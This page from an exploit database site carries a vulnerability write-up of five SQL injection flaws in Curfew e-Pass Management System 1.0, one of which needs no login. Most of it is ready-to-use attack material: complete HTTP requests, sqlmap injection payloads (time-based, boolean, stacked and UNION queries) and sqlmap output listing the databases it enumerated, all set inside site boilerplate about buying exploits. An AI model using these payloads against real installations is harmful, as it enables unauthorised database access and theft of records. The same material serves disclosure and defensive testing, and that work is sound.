0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Curfew e-Pass Management System 1.0 SQL Injection Vulnerability

Author

Mucahit Karadag

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

# Exploit Title: Curfew e-Pass Management System 1.0 Multiple SQL Injection Vulnerabilities
# Exploit Author: Mucahit Karadag
# Vendor Homepage: https://products.phpgurukul.com/product/curfew-e-pass-management-system-project-report/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=11661
# Version: 1.0
# Tested on: Ubuntu Server 14.04.6 LTS
# CVE : N/A

###
# Software Description:
# Curfew Pass Management system is a web-based technology that will manage 
# the records of pass which issue by administrative. Curfew Pass Management 
# System is an automatic system that delivers data processing at a very high 
# speed in a systematic manner.
#
# Vulnerabilitiy Description:
# Curfew e-Pass Management System 1.0 web application is vulnerable to
# 5 different SQL injection vulnerabilities in multiple endpoints.
# Vulnerabilities are listed in detail below.
# 
# In summary, vulnerabilities are
#  Unauthenticated SQL Injection Identified on searchdata Parameter
#   Authenticated SQL Injection Identified on editid Parameter
#  Authenticated SQL Injection Identified on fromdate Parameter
#   Authenticated SQL Injection Identified on searchdata Parameter
#   Authenticated SQL Injection Identified on viewid Parameter
###

##
## [Unauthenticated SQL Injection Identified on searchdata Parameter]
##

POST /cpms/index.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/index.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

searchdata=&search=

"searchdata" parameter is vulnerable to SQL injection under the search feature in the main page.

Parameter: searchdata (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchdata=asd' AND (SELECT 1646 FROM (SELECT(SLEEP(5)))qasT) AND 'hZfX'='hZfX&search=

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: searchdata=asd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x624a58537255484d436f537963554473417772544758624364725249617a63534a564271704b756d,0x71766a6271),NULL,NULL,NULL,NULL-- -&search=
---
[09:52:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[09:52:10] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on editid Parameter]
##

GET /cpms/admin/edit-category-detail.php?editid=1 HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/manage-category.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1


"editid" parameter is vulnerable to SQL injection on HTTP GET rquest to /admin/edit-category-detail.php endpoint.

---
Parameter: editid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: editid=1 AND 4435=4435

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: editid=1;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: editid=1 AND (SELECT 2111 FROM (SELECT(SLEEP(5)))TtYi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: editid=1 UNION ALL SELECT NULL,CONCAT(0x7176707871,0x5a4e55767242794d476c47766f765a4a62704b54775074624e684745515a59626662504d46726f4a,0x716a6b7071),NULL-- -
---
[09:54:59] [INFO] testing MySQL
[09:54:59] [INFO] confirming MySQL
[09:54:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:54:59] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on fromdate Parameter]
##

POST /cpms/admin/pass-bwdates-reports-details.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/pass-bwdates-report.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

fromdate=2020-08-04&todate=2020-08-26&submit=

---
Parameter: fromdate (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=2020-08-02' AND (SELECT 6843 FROM (SELECT(SLEEP(5)))eIgq) AND 'Vnjn'='Vnjn&todate=2020-08-27&submit=
---
[09:58:36] [INFO] testing MySQL
[09:58:36] [INFO] confirming MySQL
[09:58:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:58:36] [INFO] fetching database names
[09:58:36] [INFO] fetching number of databases
[09:58:36] [INFO] resumed: 5
[09:58:36] [INFO] resuming partial value: informat
[09:58:36] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[09:58:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[09:58:56] [INFO] adjusting time delay to 1 second due to good response times
[09:59:37] [INFO] retrieved: cpms
[09:59:37] [INFO] retrieved: information_schema
[10:00:56] [INFO] retrieved: mysql
[10:02:25] [INFO] retrieved: performance_schema
[10:03:41] [INFO] retrieved: phpmyadmin
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on searchdata Parameter]
##

POST /cpms/admin/search-pass.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/search-pass.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

searchdata=asd&search=

---
Parameter: searchdata (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchdata=123123123' AND (SELECT 8177 FROM (SELECT(SLEEP(5)))Hojp) AND 'vmxB'='vmxB&search=

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: searchdata=123123123' UNION ALL SELECT NULL,NULL,CONCAT(0x7162786a71,0x7174545a63634a4b774a7561487a75456a4b4f55554b6e57704f6342514a744e4643534d43724c56,0x717a6a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search=
---
[10:10:57] [INFO] testing MySQL
[10:10:57] [WARNING] reflective value(s) found and filtering out
[10:10:57] [INFO] confirming MySQL
[10:10:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:10:58] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin


##
## [Authenticated SQL Injection Identified on viewid Parameter]
##

GET /cpms/admin/view-pass-detail.php?viewid=3 HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

---
Parameter: viewid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: viewid=3 AND 2054=2054

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: viewid=3 AND (SELECT 1904 FROM (SELECT(SLEEP(5)))VWYW)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: viewid=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787871,0x6c566b51504651727a68446f5077707646555a444466646c427470556b514e704179774e6b787661,0x71766a7871),NULL-- -
---
[10:12:27] [INFO] testing MySQL
[10:12:27] [INFO] confirming MySQL
[10:12:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:12:28] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Curfew e-Pass Management System 1.0 SQL Injection Vulnerability

Report Error

Report Error